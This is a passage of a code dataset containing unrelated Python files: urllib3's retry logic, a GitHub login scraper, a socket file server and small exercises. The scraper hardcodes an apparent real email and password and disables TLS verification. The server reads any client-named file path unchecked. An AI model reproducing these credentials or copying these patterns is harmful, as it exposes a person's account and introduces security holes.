'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT = value\n\n @property\n def BACKOFF_MAX(cls):\n warnings.warn(\n \"Using 'Retry.BACKOFF_MAX' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_BACKOFF_MAX\n\n @BACKOFF_MAX.setter\n def BACKOFF_MAX(cls, value):\n warnings.warn(\n \"Using 'Retry.BACKOFF_MAX' is deprecated and \"\n \"will be removed in v2.0. 
Use 'Retry.DEFAULT_BACKOFF_MAX' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_BACKOFF_MAX = value\n\n\n@six.add_metaclass(_RetryMeta)\nclass Retry(object):\n \"\"\"Retry configuration.\n\n Each retry attempt will create a new Retry object with updated values, so\n they can be safely reused.\n\n Retries can be defined as a default for a pool::\n\n retries = Retry(connect=5, read=2, redirect=5)\n http = PoolManager(retries=retries)\n response = http.request('GET', 'http://example.com/')\n\n Or per-request (which overrides the default for the pool)::\n\n response = http.request('GET', 'http://example.com/', retries=Retry(10))\n\n Retries can be disabled by passing ``False``::\n\n response = http.request('GET', 'http://example.com/', retries=False)\n\n Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless\n retries are disabled, in which case the causing exception will be raised.\n\n :param int total:\n Total number of retries to allow. Takes precedence over other counts.\n\n Set to ``None`` to remove this constraint and fall back on other\n counts.\n\n Set to ``0`` to fail on the first retry.\n\n Set to ``False`` to disable and imply ``raise_on_redirect=False``.\n\n :param int connect:\n How many connection-related errors to retry on.\n\n These are errors raised before the request is sent to the remote server,\n which we assume has not triggered the server to process the request.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int read:\n How many times to retry on read errors.\n\n These errors are raised after the request was sent to the server, so the\n request may have side-effects.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int redirect:\n How many redirects to perform. Limit this to avoid infinite redirect\n loops.\n\n A redirect is a HTTP response with a status code 301, 302, 303, 307 or\n 308.\n\n Set to ``0`` to fail on the first retry of this type.\n\n Set to ``False`` to disable and imply ``raise_on_redirect=False``.\n\n :param int status:\n How many times to retry on bad status codes.\n\n These are retries made on responses, where status code matches\n ``status_forcelist``.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int other:\n How many times to retry on other errors.\n\n Other errors are errors that are not connect, read, redirect or status errors.\n These errors might be raised after the request was sent to the server, so the\n request might have side-effects.\n\n Set to ``0`` to fail on the first retry of this type.\n\n If ``total`` is not set, it's a good idea to set this to 0 to account\n for unexpected edge cases and avoid infinite retry loops.\n\n :param iterable allowed_methods:\n Set of uppercased HTTP method verbs that we should retry on.\n\n By default, we only retry on methods which are considered to be\n idempotent (multiple requests with the same parameters end with the\n same state). See :attr:`Retry.DEFAULT_ALLOWED_METHODS`.\n\n Set to a ``False`` value to retry on any verb.\n\n .. 
warning::\n\n Previously this parameter was named ``method_whitelist``, that\n usage is deprecated in v1.26.0 and will be removed in v2.0.\n\n :param iterable status_forcelist:\n A set of integer HTTP status codes that we should force a retry on.\n A retry is initiated if the request method is in ``allowed_methods``\n and the response status code is in ``status_forcelist``.\n\n By default, this is disabled with ``None``.\n\n :param float backoff_factor:\n A backoff factor to apply between attempts after the second try\n (most errors are resolved immediately by a second try without a\n delay). urllib3 will sleep for::\n\n {backoff factor} * (2 ** ({number of total retries} - 1))\n\n seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep\n for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer\n than :attr:`Retry.DEFAULT_BACKOFF_MAX`.\n\n By default, backoff is disabled (set to 0).\n\n :param bool raise_on_redirect: Whether, if the number of redirects is\n exhausted, to raise a MaxRetryError, or to return a response with a\n response code in the 3xx range.\n\n :param bool raise_on_status: Similar meaning to ``raise_on_redirect``:\n whether we should raise an exception, or return a response,\n if status falls in ``status_forcelist`` range and retries have\n been exhausted.\n\n :param tuple history: The history of the request encountered during\n each call to :meth:`~Retry.increment`. The list is in the order\n the requests occurred. Each list item is of class :class:`RequestHistory`.\n\n :param bool respect_retry_after_header:\n Whether to respect Retry-After header on status codes defined as\n :attr:`Retry.RETRY_AFTER_STATUS_CODES` or not.\n\n :param iterable remove_headers_on_redirect:\n Sequence of headers to remove from the request when a response\n indicating a redirect is returned before firing off the redirected\n request.\n \"\"\"\n\n #: Default methods to be used for ``allowed_methods``\n DEFAULT_ALLOWED_METHODS = frozenset(\n [\"HEAD\", \"GET\", \"PUT\", \"DELETE\", \"OPTIONS\", \"TRACE\"]\n )\n\n #: Default status codes to be used for ``status_forcelist``\n RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503])\n\n #: Default headers to be used for ``remove_headers_on_redirect``\n DEFAULT_REMOVE_HEADERS_ON_REDIRECT = frozenset([\"Cookie\", \"Authorization\"])\n\n #: Maximum backoff time.\n DEFAULT_BACKOFF_MAX = 120\n\n def __init__(\n self,\n total=10,\n connect=None,\n read=None,\n redirect=None,\n status=None,\n other=None,\n allowed_methods=_Default,\n status_forcelist=None,\n backoff_factor=0,\n raise_on_redirect=True,\n raise_on_status=True,\n history=None,\n respect_retry_after_header=True,\n remove_headers_on_redirect=_Default,\n # TODO: Deprecated, remove in v2.0\n method_whitelist=_Default,\n ):\n\n if method_whitelist is not _Default:\n if allowed_methods is not _Default:\n raise ValueError(\n \"Using both 'allowed_methods' and \"\n \"'method_whitelist' together is not allowed. \"\n \"Instead only use 'allowed_methods'\"\n )\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. 
Use 'allowed_methods' instead\",\n DeprecationWarning,\n stacklevel=2,\n )\n allowed_methods = method_whitelist\n if allowed_methods is _Default:\n allowed_methods = self.DEFAULT_ALLOWED_METHODS\n if remove_headers_on_redirect is _Default:\n remove_headers_on_redirect = self.DEFAULT_REMOVE_HEADERS_ON_REDIRECT\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n self.other = other\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.allowed_methods = allowed_methods\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = frozenset(\n [h.lower() for h in remove_headers_on_redirect]\n )\n\n def new(self, **kw):\n params = dict(\n total=self.total,\n connect=self.connect,\n read=self.read,\n redirect=self.redirect,\n status=self.status,\n other=self.other,\n status_forcelist=self.status_forcelist,\n backoff_factor=self.backoff_factor,\n raise_on_redirect=self.raise_on_redirect,\n raise_on_status=self.raise_on_status,\n history=self.history,\n remove_headers_on_redirect=self.remove_headers_on_redirect,\n respect_retry_after_header=self.respect_retry_after_header,\n )\n\n # TODO: If already given in **kw we use what's given to us\n # If not given we need to figure out what to pass. We decide\n # based on whether our class has the 'method_whitelist' property\n # and if so we pass the deprecated 'method_whitelist' otherwise\n # we use 'allowed_methods'. Remove in v2.0\n if \"method_whitelist\" not in kw and \"allowed_methods\" not in kw:\n if \"method_whitelist\" in self.__dict__:\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. 
Use 'allowed_methods' instead\",\n DeprecationWarning,\n )\n params[\"method_whitelist\"] = self.allowed_methods\n else:\n params[\"allowed_methods\"] = self.allowed_methods\n\n params.update(kw)\n return type(self)(**params)\n\n @classmethod\n def from_int(cls, retries, redirect=True, default=None):\n \"\"\"Backwards-compatibility for the old retries format.\"\"\"\n if retries is None:\n retries = default if default is not None else cls.DEFAULT\n\n if isinstance(retries, Retry):\n return retries\n\n redirect = bool(redirect) and None\n new_retries = cls(retries, redirect=redirect)\n log.debug(\"Converted retries value: %r -> %r\", retries, new_retries)\n return new_retries\n\n def get_backoff_time(self):\n \"\"\"Formula for computing the current backoff\n\n :rtype: float\n \"\"\"\n # We want to consider only the last consecutive errors sequence (Ignore redirects).\n consecutive_errors_len = len(\n list(\n takewhile(lambda x: x.redirect_location is None, reversed(self.history))\n )\n )\n if consecutive_errors_len <= 1:\n return 0\n\n backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1))\n return min(self.DEFAULT_BACKOFF_MAX, backoff_value)\n\n def parse_retry_after(self, retry_after):\n # Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4\n if re.match(r\"^\\s*[0-9]+\\s*$\", retry_after):\n seconds = int(retry_after)\n else:\n retry_date_tuple = email.utils.parsedate_tz(retry_after)\n if retry_date_tuple is None:\n raise InvalidHeader(\"Invalid Retry-After header: %s\" % retry_after)\n if retry_date_tuple[9] is None: # Python 2\n # Assume UTC if no timezone was specified\n # On Python2.7, parsedate_tz returns None for a timezone offset\n # instead of 0 if no timezone is given, where mktime_tz treats\n # a None timezone offset as local time.\n retry_date_tuple = retry_date_tuple[:9] + (0,) + retry_date_tuple[10:]\n\n retry_date = email.utils.mktime_tz(retry_date_tuple)\n seconds = retry_date - time.time()\n\n if seconds < 0:\n seconds = 0\n\n return seconds\n\n def get_retry_after(self, response):\n \"\"\"Get the value of Retry-After in seconds.\"\"\"\n\n retry_after = response.headers.get(\"Retry-After\")\n\n if retry_after is None:\n return None\n\n return self.parse_retry_after(retry_after)\n\n def sleep_for_retry(self, response=None):\n retry_after = self.get_retry_after(response)\n if retry_after:\n time.sleep(retry_after)\n return True\n\n return False\n\n def _sleep_backoff(self):\n backoff = self.get_backoff_time()\n if backoff <= 0:\n return\n time.sleep(backoff)\n\n def sleep(self, response=None):\n \"\"\"Sleep between retry attempts.\n\n This method will respect a server's ``Retry-After`` response header\n and sleep the duration of the time requested. If that is not present, it\n will use an exponential backoff. 
By default, the backoff factor is 0 and\n this method will return immediately.\n \"\"\"\n\n if self.respect_retry_after_header and response:\n slept = self.sleep_for_retry(response)\n if slept:\n return\n\n self._sleep_backoff()\n\n def _is_connection_error(self, err):\n \"\"\"Errors when we're fairly sure that the server did not receive the\n request, so it should be safe to retry.\n \"\"\"\n if isinstance(err, ProxyError):\n err = err.original_error\n return isinstance(err, ConnectTimeoutError)\n\n def _is_read_error(self, err):\n \"\"\"Errors that occur after the request has been started, so we should\n assume that the server began processing it.\n \"\"\"\n return isinstance(err, (ReadTimeoutError, ProtocolError))\n\n def _is_method_retryable(self, method):\n \"\"\"Checks if a given HTTP method should be retried upon, depending if\n it is included in the allowed_methods\n \"\"\"\n # TODO: For now favor if the Retry implementation sets its own method_whitelist\n # property outside of our constructor to avoid breaking custom implementations.\n if \"method_whitelist\" in self.__dict__:\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. Use 'allowed_methods' instead\",\n DeprecationWarning,\n )\n allowed_methods = self.method_whitelist\n else:\n allowed_methods = self.allowed_methods\n\n if allowed_methods and method.upper() not in allowed_methods:\n return False\n return True\n\n def is_retry(self, method, status_code, has_retry_after=False):\n \"\"\"Is this method/status code retryable? (Based on allowlists and control\n variables such as the number of total retries to allow, whether to\n respect the Retry-After header, whether this header is present, and\n whether the returned status code is on the list of status codes to\n be retried upon on the presence of the aforementioned header)\n \"\"\"\n if not self._is_method_retryable(method):\n return False\n\n if self.status_forcelist and status_code in self.status_forcelist:\n return True\n\n return (\n self.total\n and self.respect_retry_after_header\n and has_retry_after\n and (status_code in self.RETRY_AFTER_STATUS_CODES)\n )\n\n def is_exhausted(self):\n \"\"\"Are we out of retries?\"\"\"\n retry_counts = (\n self.total,\n self.connect,\n self.read,\n self.redirect,\n self.status,\n self.other,\n )\n retry_counts = list(filter(None, retry_counts))\n if not retry_counts:\n return False\n\n return min(retry_counts) < 0\n\n def increment(\n self,\n method=None,\n url=None,\n response=None,\n error=None,\n _pool=None,\n _stacktrace=None,\n ):\n \"\"\"Return a new Retry object with incremented retry counters.\n\n :param response: A response object, or None, if the server did not\n return a response.\n :type response: :class:`~urllib3.response.HTTPResponse`\n :param Exception error: An error encountered during the request, or\n None if the response was received successfully.\n\n :return: A new ``Retry`` object.\n \"\"\"\n if self.total is False and error:\n # Disabled, indicate to re-raise the error.\n raise six.reraise(type(error), error, _stacktrace)\n\n total = self.total\n if total is not None:\n total -= 1\n\n connect = self.connect\n read = self.read\n redirect = self.redirect\n status_count = self.status\n other = self.other\n cause = \"unknown\"\n status = None\n redirect_location = None\n\n if error and self._is_connection_error(error):\n # Connect retry?\n if connect is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif connect is not None:\n connect -= 1\n\n 
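# A read error can arrive after the server has started processing the request, so it is retried only for methods deemed idempotent (see _is_method_retryable below).\n        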
elif error and self._is_read_error(error):\n            # Read retry?\n            if read is False or not self._is_method_retryable(method):\n                raise six.reraise(type(error), error, _stacktrace)\n            elif read is not None:\n                read -= 1\n\n        elif error:\n            # Other retry?\n            if other is not None:\n                other -= 1\n\n        elif response and response.get_redirect_location():\n            # Redirect retry?\n            if redirect is not None:\n                redirect -= 1\n            cause = \"too many redirects\"\n            redirect_location = response.get_redirect_location()\n            status = response.status\n\n        else:\n            # Incrementing because of a server error like a 500 in\n            # status_forcelist and the given method is in the allowed_methods\n            cause = ResponseError.GENERIC_ERROR\n            if response and response.status:\n                if status_count is not None:\n                    status_count -= 1\n                cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status)\n                status = response.status\n\n        history = self.history + (\n            RequestHistory(method, url, error, status, redirect_location),\n        )\n\n        new_retry = self.new(\n            total=total,\n            connect=connect,\n            read=read,\n            redirect=redirect,\n            status=status_count,\n            other=other,\n            history=history,\n        )\n\n        if new_retry.is_exhausted():\n            raise MaxRetryError(_pool, url, error or ResponseError(cause))\n\n        log.debug(\"Incremented Retry for (url='%s'): %r\", url, new_retry)\n\n        return new_retry\n\n    def __repr__(self):\n        return (\n            \"{cls.__name__}(total={self.total}, connect={self.connect}, \"\n            \"read={self.read}, redirect={self.redirect}, status={self.status})\"\n        ).format(cls=type(self), self=self)\n\n    def __getattr__(self, item):\n        if item == \"method_whitelist\":\n            # TODO: Remove this deprecated alias in v2.0\n            warnings.warn(\n                \"Using 'method_whitelist' with Retry is deprecated and \"\n                \"will be removed in v2.0. Use 'allowed_methods' instead\",\n                DeprecationWarning,\n            )\n            return self.allowed_methods\n        try:\n            return getattr(super(Retry, self), item)\n        except AttributeError:\n            return getattr(Retry, item)\n\n\n# For backwards compatibility (equivalent to pre-v1.9):\nRetry.DEFAULT = Retry(3)\n","repo_name":"pypa/pipenv","sub_path":"pipenv/patched/pip/_vendor/urllib3/util/retry.py","file_name":"retry.py","file_ext":"py","file_size_in_byte":22013,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"} +{"seq_id":"16964033740","text":"\"\"\"\n    Simulated GitHub login\ndate: 18-10-20 9:17 AM\n\"\"\"\nimport requests\nfrom lxml import etree\n\n\nclass Login(object):\n    \"\"\"\n    Simulated GitHub login\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        Initialize\n        \"\"\"\n        # Request headers\n        self.headers = {\n            \"Referer\": \"https://github.com\",\n            \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n            \"Host\": \"github.com\"\n        }\n        # Login page URL\n        self.login_url = \"https://github.com/login\"\n        # Form submission URL\n        self.post_url = \"https://github.com/session\"\n        # Profile page URL\n        self.logined_url = \"https://github.com/settings/profile\"\n        # Session -- handles cookies automatically\n        self.session = requests.Session()\n\n    def token(self):\n        \"\"\"\n        Fetch the hidden form parameter needed for submission\n        :return: form token\n        \"\"\"\n        # Request the login page; verify toggles certificate validation\n        response = self.session.get(self.login_url, headers=self.headers, verify=False)\n        # Parse the response body\n        selector = etree.HTML(response.text)\n        # Extract the CSRF token from the form\n        token = selector.xpath(\"//form/input[2]/@value\")[0]\n        # Return the token\n        return token\n\n    def login(self, email, password):\n        \"\"\"\n        Simulate login by submitting the form\n        :param email: account\n        :param password: password\n        :return:\n        \"\"\"\n        # Form data to submit\n        post_data = {\n            \"commit\": \"Sign in\",\n            \"utf8\": \"✓\",\n            \"authenticity_token\": self.token(),\n            \"login\": email,\n            \"password\": password\n        }\n        # Post the form; post_url is the submit endpoint, post_data the payload\n        response = self.session.post(self.post_url, data=post_data, headers=self.headers, verify=False)\n        # If the status code is 200\n        if response.status_code == 200:\n            # Handle the activity feed\n            self.dynamics(response.text)\n\n        # Request the profile page\n        response = self.session.get(self.logined_url, headers=self.headers, verify=False)\n        # If the status code is 200\n        if response.status_code == 200:\n            # Handle the profile info\n            self.profile(response.text)\n\n    def dynamics(self, html):\n        \"\"\"\n        Extract activity feed entries\n        :param html: page source\n        :return:\n        \"\"\"\n        # Parse the source\n        selector = etree.HTML(html)\n        # Extract the feed items\n        dynamics = selector.xpath(\"//div[contains(@class, 'news')]//div[contains(@class, 'alert')]\")\n        # Loop over the items\n        for item in dynamics:\n            # Get the text of each entry\n            dynamic = \" \".join(item.xpath(\".//div[@class='title']//text()\")).strip()\n            # Print it\n            print(dynamic)\n\n    def profile(self, html):\n        \"\"\"\n        Extract profile info\n        :param html: page source\n        :return:\n        \"\"\"\n        # Parse the source\n        selector = etree.HTML(html)\n        # Extract the user name\n        name = selector.xpath(\"//input[@id='user_profile_name']/@value\")[0]\n        # Extract the email addresses\n        email = selector.xpath(\"//select[@id='user_profile_email']/option[@value!='']/text()\")\n        # Print them\n        print(name, email)\n\n\nif __name__ == '__main__':\n    login = Login()\n    login.login(\"lnsist@yeah.net\", \"Xx.992246086\")\n","repo_name":"lnsist/DemoTest","sub_path":"爬虫/Cookies池/模拟登陆/模拟登陆_Github.py","file_name":"模拟登陆_Github.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21727614947","text":"# sb_conf.py\n\nimport json\nimport os.path\nfrom etc import Debug\n# Simple JSON Handler\n\n\ndef Write(filename, config) -> bool:\n    \"\"\"Returns True when the file operation was successful, otherwise False.\"\"\"\n    try:\n        with open(filename, \"w\") as f:\n            json.dump(config, f, indent=4)\n            Debug(f\"Wrote configuration to {filename}.\")\n            retVal = True\n            f.close()\n\n    except Exception as e:\n        print(\"Failed to write config file: \", e)\n        retVal = False\n    return retVal\n\n\ndef Read(filename, default) -> dict:\n    \"\"\"\n    Returns a dictionary loaded from a JSON file located at the given path, or a default if file doesn't exist.\n    Return None when an error occurs during the file operation.\n    \"\"\"\n\n    if not os.path.isfile(filename):\n        Debug(\"Config file doesn't exist. 
Creating...\")\n Write(filename, default)\n Debug(f\"Config file {filename} created.\")\n retVal = default\n else:\n try:\n with open(filename, \"r\") as f:\n config = json.load(f)\n Debug(f\"Successfully read configuration file: {filename}.\")\n retVal = config\n f.close()\n\n except Exception as x:\n print(f\"An error occurred during reading {filename}: {x}\")\n retVal = None\n return retVal\n","repo_name":"Befector/SimpleBank","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24836741159","text":"# -*- coding: utf-8 -*-\n\nclass PerfectNum():\n def perfectNum(self, num: \"int\") -> \"int\":\n ct = 0\n # ans = []\n for i in range(2, num + 1):\n sum_ = 1\n for j in range(2, int(i ** 0.5) + 1):\n if i % j == 0:\n sum_ += j\n sum_ += i / j\n if i == sum_:\n ct += 1\n # ans.append(i)\n # print(ans)\n return ct\n\ndef main():\n test = PerfectNum()\n print(test.perfectNum(1000))\n\nif __name__ == \"__main__\":\n main()","repo_name":"gli81/HuaweiTest","sub_path":"056/PerfectNum.py","file_name":"PerfectNum.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11904377774","text":"import logging\nfrom os.path import abspath, dirname, join\nimport sys\nimport unittest\n\n\nfrom merlion.evaluate.forecast import ForecastEvaluator, ForecastEvaluatorConfig, ForecastMetric\nfrom merlion.models.ensemble.combine import MetricWeightedMean\nfrom merlion.models.ensemble.forecast import ForecasterEnsemble, ForecasterEnsembleConfig\nfrom merlion.models.forecast.arima import ArimaConfig, Arima\nfrom merlion.models.forecast.ets import ETSConfig, ETS\nfrom merlion.transform.base import Identity\nfrom merlion.utils.data_io import csv_to_time_series\nfrom merlion.utils.time_series import UnivariateTimeSeries\n\n\nlogger = logging.getLogger(__name__)\nrootdir = dirname(dirname(dirname(abspath(__file__))))\n\n\nclass TestEvaluateForecast(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def test_single_model(self):\n print(\"-\" * 80)\n logger.info(\"test_single_model\\n\" + \"-\" * 80 + \"\\n\")\n\n # Create a piecewise linear time series\n values = [i for i in range(60)]\n values += [values[-1] + 2 * (i + 1) for i in range(30)]\n values += [values[-1] + 3 * (i + 1) for i in range(30)]\n values += [values[-1] + 1 * (i + 1) for i in range(30)]\n ts = UnivariateTimeSeries(time_stamps=None, values=values, freq=\"1d\").to_ts()\n\n # Get train & test split\n self.train_data = ts[:30]\n self.test_data = ts[30:]\n\n # Set up a simple ARIMA model that can learn a linear relationship\n # We will be training the model on 30 day chunks (which are linear) and\n # having it forecast on 30 days chunks (which may have a different\n # slope than the model expects)\n self.model = Arima(ArimaConfig(order=(1, 1, 0), max_forecast_steps=30))\n\n logger.info(\"Training model using an evaluator...\")\n evaluator = ForecastEvaluator(\n model=self.model, config=ForecastEvaluatorConfig(retrain_freq=\"30d\", train_window=\"30d\")\n )\n\n # Get pred\n _, pred = evaluator.get_predict(train_vals=self.train_data, test_vals=self.test_data)\n\n # Calculate evaluation metric\n smape = evaluator.evaluate(ground_truth=self.test_data, predict=pred, metric=ForecastMetric.sMAPE)\n self.assertAlmostEqual(smape, 9.9, delta=0.1)\n\n def test_ensemble(self):\n 
print(\"-\" * 80)\n logger.info(\"test_ensemble\\n\" + \"-\" * 80 + \"\\n\")\n\n csv_name = join(rootdir, \"data\", \"example.csv\")\n ts = csv_to_time_series(csv_name, timestamp_unit=\"ms\", data_cols=[\"kpi\"]).align(granularity=\"1h\")\n n_test = len(ts) // 5\n train, test = ts[:-n_test], ts[-n_test:]\n\n # Construct ensemble to forecast up to 120hr in the future\n n = 120\n kwargs = dict(max_forecast_steps=n, transform=Identity(), refit=False)\n model0 = ETS(ETSConfig(error=\"add\", trend=\"add\", damped_trend=True, **kwargs))\n model1 = ETS(ETSConfig(error=\"mul\", trend=\"mul\", damped_trend=True, **kwargs))\n model2 = ETS(ETSConfig(error=\"mul\", trend=\"add\", damped_trend=False, **kwargs))\n ensemble = ForecasterEnsemble(\n config=ForecasterEnsembleConfig(combiner=MetricWeightedMean(metric=ForecastMetric.sMAPE)),\n models=[model0, model1, model2],\n )\n\n # Set up evaluator & run it on the data\n evaluator = ForecastEvaluator(\n model=ensemble,\n config=ForecastEvaluatorConfig(retrain_freq=\"7d\", horizon=\"5d\", cadence=0, train_window=None),\n )\n\n _, pred = evaluator.get_predict(train_vals=train, test_vals=test)\n self.assertIsInstance(pred, list)\n self.assertEqual(len(pred), len(test))\n\n # Compute ensemble's sMAPE\n smape = evaluator.evaluate(ground_truth=test, predict=pred, metric=ForecastMetric.sMAPE)\n self.assertAlmostEqual(smape, 77.9, delta=2.0)\n\n # Do a quick test of save/load\n ensemble.save(\"tmp/eval/forecast_ensemble\")\n ForecasterEnsemble.load(\"tmp/eval/forecast_ensemble\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s\", stream=sys.stdout, level=logging.INFO\n )\n unittest.main()\n","repo_name":"salesforce/Merlion","sub_path":"tests/evaluate/test_eval_forecast.py","file_name":"test_eval_forecast.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":3145,"dataset":"github-code","pt":"34"} +{"seq_id":"1526696843","text":"# ----------------------------------------------\n# Analyze estimated data\n# ----------------------------------------------\n\nimport cv2\nimport sys\nimport numpy as np\nimport os\n\nimport matplotlib.pyplot as plt\n\nlines=open(\"./estimated/identity_meta_with_estimated_age.csv\").readlines()\n\nfig = plt.figure()\nax1 = fig.add_axes((0.1, 0.6, 0.8, 0.3))\nax2 = fig.add_axes((0.1, 0.1, 0.8, 0.3))\nax1.tick_params(labelbottom=\"on\")\nax2.tick_params(labelleft=\"on\")\n\nmax_cnt=len(lines)\n\ngender_list=np.zeros((max_cnt))\nage_list=np.zeros((max_cnt))\n\nDISTRIBUTION_FILE='./estimated/estimated_distribution.png'\n\ncnt=0\n\nfor line in lines:\n\tobj=line.split(\", \")\n\tpath=obj[0]\n\ttrainset=obj[3]\n\tgender=obj[4].strip()\n\tage=int(obj[5].strip())\n\n\tif gender==\"f\":\n\t\tgender_list[cnt]=0\n\telse:\n\t\tgender_list[cnt]=1\n\tage_list[cnt]=age\n\n\tcnt=cnt+1\n\nax1.hist(gender_list, bins=2)\nax1.set_title('gender')\nax1.set_xlabel('gender')\nax1.set_ylabel('count')\nax1.legend(loc='upper right')\n\nax2.hist(age_list, bins=101, range=(0,100))\nax2.set_title('age')\nax2.set_xlabel('age')\nax2.set_ylabel('count')\nax2.legend(loc='upper right')\n\nfig.savefig(DISTRIBUTION_FILE)\nsys.exit(1)\n\n","repo_name":"abars/VGGFace2AgeLabel","sub_path":"analyze_estimated_age.py","file_name":"analyze_estimated_age.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"28821959931","text":"#!/usr/bin/env 
python\n# -*- coding: utf-8 -*-\n# @Time : 2020/1/22 下午3:46\n# @File : server.py\n# @Project : PythonFullStack\n# @Software : PyCharm\n# ----------------------------------------------\n# ☆ ☆ ☆ ☆ ☆ ☆ ☆ \n# >>> Author : Alex\n# >>> QQ : 2426671397\n# >>> Mail : alex18812649207@gmail.com\n# >>> Github : https://github.com/koking0\n# ☆ ☆ ☆ ☆ ☆ ☆ ☆\nimport json\nimport os\nimport socket\nimport struct\n\nshare_dir = r'/media/alex/新加卷/PythonProject/PythonFullStack/第三模块_面向对象&网络编程基础/文件传输/server/share'\n\n\ndef get_order(connect, filename):\n # 3.把命令的结果返回给客户端\n # 3.1、首先制作固定长度的报头\n header_dict = {\n 'filename': filename,\n 'data_size': os.path.getsize('%s/%s' % (share_dir, filename))\n }\n header_json = json.dumps(header_dict)\n header_bytes = header_json.encode('utf-8')\n\n # 3.2、其次把报头长度发送给客户端\n connect.send(struct.pack('i', len(header_bytes)))\n\n # 3.3、然后发送报头数据\n connect.send(header_bytes)\n\n # 3.3、最后再发送文件的数据\n with open('%s/%s' % (share_dir, filename), 'rb') as f:\n for line in f:\n connect.send(line)\n\n\ndef run():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(('127.0.0.1', 9902))\n server.listen(5)\n\n print('Starting...')\n while True: # 链接循环\n connect, client_address = server.accept()\n print(client_address)\n\n while True: # 通信循环\n try:\n # 1.接收命令\n cmd = connect.recv(1024)\n if not cmd:\n break\n print('recv commend: ', cmd)\n\n # 2.解析命令,拿到命令参数\n cmds = cmd.decode('utf-8').split()\n order = cmds[0]\n filename = cmds[1]\n if order == 'get':\n get_order(connect, filename)\n except ConnectionResetError:\n break\n connect.close()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"koking0/PythonFullStack","sub_path":"第三模块_面向对象+网络编程基础/文件传输/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27511104187","text":"# vrinda bhatia code\n# [Done]First Part to input the para\n# [Done]putting the words in dict and displaying the dict like in the input format\n# [Done]last is we have to change the casing small->capital and capital->small\ndef paragraph(para):\n output = {}\n for word in para.split():\n a = word.upper()\n if a in output.keys():\n output[a] = output.get(a) + 1\n else:\n output[a] = 1\n\n sort = sorted(output, key=output.get, reverse=True)[:5]\n print(\"TOP FIVE Elements acc to frequency\")\n for element in sort:\n print(element)\n print(output[element])\n\n print(output)\n\n\ndef printLine(para):\n finalWords = []\n for i in para.split():\n temp = []\n for char in list(i):\n if (char.isupper()):\n temp.append(a.join(char.lower()))\n else:\n temp.append(a.join(char.upper()))\n finalWords.append(temp)\n sentence(finalWords)\n\n\ndef sentence(finalWords):\n ans = \" \"\n for i in finalWords:\n word = \" \"\n for j in i:\n word = word + j\n\n ans = ans + word + \" \"\n\n print(ans)\n\n\na = \"Test is to TEST the Cloud Students. 
